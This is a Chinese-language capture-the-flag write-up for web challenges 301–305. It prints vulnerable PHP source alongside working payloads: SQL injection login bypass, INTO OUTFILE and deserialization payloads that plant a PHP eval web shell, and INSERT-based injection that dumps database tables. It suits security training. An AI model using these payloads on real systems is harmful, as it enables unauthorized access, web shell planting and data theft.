web301
下载源码后在checklogin.php发现问题代码
<?php
error_reporting(0);
session_start();
require 'conn.php';
$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";
$_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:"";
$username=$_POST['userid'];
$userpwd=$_POST['userpwd'];
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
if($result->num_rows<1){
$_SESSION['error']="1";
header("location:login.php");
return;
}
if(!strcasecmp($userpwd,$row['sds_password'])){
$_SESSION['login']=1;
$result->free();
$mysqli->close();
header("location:index.php");
return;
}
$_SESSION['error']="1";
header("location:login.php");
?>
这里有一句完全没过滤的sql查询语句,而username是我们可控的,再看它下面的逻辑,会将查询到的用户名和密码比较,如果用户名和密码相同就登陆成功。
strcasecmp(string1,string2)
string1 必需。规定要比较的第一个字符串。
string2 必需。规定要比较的第二个字符串。
该函数返回:
0 - 如果两个字符串相等
<0 - 如果 string1 小于 string2
>0 - 如果 string1 大于 string2
那这里就可以用联合查询让username返回1
payload:
userid=-1' union select 1%23&userpwd=1
或者也可以用sqlmap去跑
web302
修改了代码的一个地方
if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){
直接写马即可,虽然经过sds_decode()函数的处理,但是他的sql语句已经执行了
payload:
userid=-1' union select "<?php @eval($_POST[a]);?>" into outfile "/var/www/html/a.php"#&userpwd=1
web303
先用弱口令admin/admin,诶,直接进去了,但是并没有flag,审计下载的源码,在dptadd.php发现注入点
<?php
session_start();
require 'conn.php';
if(!isset($_SESSION['login'])){
header("location:login.php");
return;
}else{
//注入点
$_POST['dpt_name']=!empty($_POST['dpt_name'])?$_POST['dpt_name']:NULL;
$_POST['dpt_address']=!empty($_POST['dpt_address'])?$_POST['dpt_address']:NULL;
$_POST['dpt_build_year']=!empty($_POST['dpt_build_year'])?$_POST['dpt_build_year']:NULL;
$_POST['dpt_has_cert']=!empty($_POST['dpt_has_cert'])?$_POST['dpt_has_cert']:NULL;
$_POST['dpt_cert_number']=!empty($_POST['dpt_cert_number'])?$_POST['dpt_cert_number']:NULL;
$_POST['dpt_telephone_number']=!empty($_POST['dpt_telephone_number'])?$_POST['dpt_telephone_number']:NULL;
$dpt_name=$_POST['dpt_name'];
$dpt_address=$_POST['dpt_address'];
$dpt_build_year=$_POST['dpt_build_year'];
$dpt_has_cert=$_POST['dpt_has_cert']=="on"?"1":"0";
$dpt_cert_number=$_POST['dpt_cert_number'];
$dpt_telephone_number=$_POST['dpt_telephone_number'];
$mysqli->query("set names utf-8");
$sql="insert into sds_dpt set sds_name='".$dpt_name."',sds_address ='".$dpt_address."',sds_build_date='".$dpt_build_year."',sds_have_safe_card='".$dpt_has_cert."',sds_safe_card_num='".$dpt_cert_number."',sds_telephone='".$dpt_telephone_number."';";
$result=$mysqli->query($sql);
echo $sql;
if($result===true){
$mysqli->close();
header("location:dpt.php");
}else{
die(mysqli_error($mysqli));
}
}
?>
这里可以在insert插入时注入。
payload:
dpt_name=1&dpt_address=1&dpt_build_year=2001-07-01&dpt_has_cert=1&dpt_cert_number=1',sds_telephone=(select group_concat(table_name) from information_schema.tables where table_schema=database())%23&dpt_telephone_number=
dpt_name=1&dpt_address=1&dpt_build_year=2001-07-01&dpt_has_cert=1&dpt_cert_number=1',sds_telephone=(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')%23&dpt_telephone_number=
dpt_name=1&dpt_address=1&dpt_build_year=2001-07-01&dpt_has_cert=1&dpt_cert_number=1',sds_telephone=(select group_concat(flag) from sds_fl9g)%23&dpt_telephone_number=
web304
增加了waf
function sds_waf($str){
return preg_match('/[0-9]|[a-z]|-/i', $str);
}
但是上题payload还是能用,只是把表名从sds_fl9g换成sds_flaag
web305
class.php中存在反序列化点,直接写马,在checklogin.php中传入
//class.php
<?php
class user{
public $username;
public $password;
public function __construct($u,$p){
$this->username=$u;
$this->password=$p;
}
public function __destruct(){
file_put_contents($this->username, $this->password);
}
}
//checklogin.php
<?php
error_reporting(0);
session_start();
require 'conn.php';
require 'fun.php';
require 'class.php';
$user_cookie = $_COOKIE['user'];
poc:
<?php
class user{
public $username;
public $password;
public function __construct($u,$p){
$this->username=$u;
$this->password=$p;
}
}
$a = new user('1.php','<?php @eval($_POST[a]);?>');
echo urlencode(serialize($a));
然后在burp中抓包打
用蚁剑连接时要注意把cookie加上,否则连接不上,然后连接数据库,在数据库中获取flag
